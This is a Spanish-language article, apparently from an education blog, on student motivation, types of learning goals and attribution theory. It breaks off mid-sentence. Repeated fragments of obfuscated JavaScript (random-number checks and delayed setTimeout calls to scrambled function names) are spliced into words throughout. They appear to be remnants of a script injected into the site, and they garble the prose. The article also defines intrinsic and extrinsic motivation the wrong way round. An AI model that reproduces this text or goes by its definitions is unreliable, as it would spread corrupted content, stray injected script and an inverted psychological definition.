¿CÓMO MOTIVAR AL ALUMNADO? TIPOS DE MOTIVACIÓN Y DIFERENTES METAS DE APRENDIZAJE.

Autora: Mª Teresa Vivas Martín

Un buen docente debe saber cómo motivar al alumnado para conseguir una buena calidad de enseñanza y aprendizaje. Existen diferentes tipos de motivación que nos llevan a plantearnos diferentes metas a lo largo de nuestra “aventura” como docentes o estudiantes. El uso de las nuevas tecnologías es una buena forma de mantener la atención y motivación del alumnado y así fomentar un aprendizaje autorregulado sin olvidar una evaluación continuada del mismo.

El proceso de enseñanza-aprendizaje es lo que desarrollamos, nosotros los docentes, en el centro educativo, pero como bien saben ustedes para que este proceso funcione los padres y por supuesto los alumnos deben poner de su parte y proponer sus propias metas de aprendizaje, es decir sus propios objetivos. Pero antes de hablar de las metas me gustaría hablar sobre motivación. ¿Qué es para ustedes la motivación? Motivación es lo que necesita toda persona para que la realización de su trabajo sea lo más fructífera posible. Según el informe PISA y cito textualmente: “el éxito del sistema educativo está en lograr una mayor motivación en el alumnado. El estudiante debe aprender que lo que estudia no sólo sirve para la escuela, sino que le abrirá nuevas oportunidades en el futuro”. Pero diferenciemos dos tipos de motivación: intrínseca: hacemos las cosas para aprobar o para lograr algo y extrínseca es cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando hacemos algo porque queremos y nos gusta. Por ejemplo motivación intrínseca es cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando leemos un libro porque nos lo han mandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andado en clase pero si leemos un libro porque queremos en nuestro tiempo libre es motivación extrínseca. El problema está en que es muy difícil, o al menos a simple vista, incrementar la motivación en ciertos estudiantes. Relacionado con la motivación están las metas que uno mismo se plantea pero según la cantidad de motivación que tengamos así plantearemos nuestras  metas. Existen diferentes metas:

  1. De dominio o aprendizaje: mejor y aprender
  2. De desempeño: verse bien uno mismo demostrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando tus habilidades a lo demás
  3. De metas sociales

El docente utiliza el método de la retroalimentación para que el establecimiento de las metas en el aula resulte eficaz y otro método es saber aceptar las metas de cada uno como propias del ser y que no se vean afectados por las de los demás.

Para que todo esto funcione de una manera adecuada  debemos mejorar la autoestima de los estudiantes para hacerles crecer su motivación y así lograr las metas establecidas. Por ello debemos saber qué piensan ellos acerca del “yo”

Debemos lograr que nuestros alumnos estudien de manera autónoma y no obligados y debemos hacer saber que el estudio es algo útil para nuestro futuro y no algo que hay que hacerlo para solo aprobar, debemos hacer que nuestra enseñanza se entienda como algo útil, ya que ver los contenidos como algo que no sirve hace que la motivación disminuya. Debemos relacionar lo que enseñamos con el mundo real pero algo muy importante para los docentes es no solo enseñar contenidos sino también saber cómo enseñarlos, debemos no aburrir a los alumnos, utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando temas de interés en nuestras aulas como las nuevas tecnologías.

La motivación puede ser tratada desde puntos de vista diferentes por ejemplo desde el conductismo, a través de la conducta y desde el cognitivismo teoría que se basa en la mente del individuo.

Según la teoría de la atribución, nuestra motivación se ve afectada por las explicaciones y las causas que  nos formulemos sobre uno mismo, sobre los éxitos y fracasos y se caracterizan por: el locus o ubicación de la causa, su estabilidad y  si el individuo es capaz de controlarla.

Las atribuciones se dan en la clase como por ejemplo decir que han suspendido un examen porque el profesor no ha explicado bien la materia la materia o viceversa.

Como vemos todo lo estamos basandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en la motivación que es el principal objetivo a alcanzar en los estudiantes.

Algo que debemos también señalar, es que le estudiante está en continuo cambio ya que la sociedad está continuamente cambi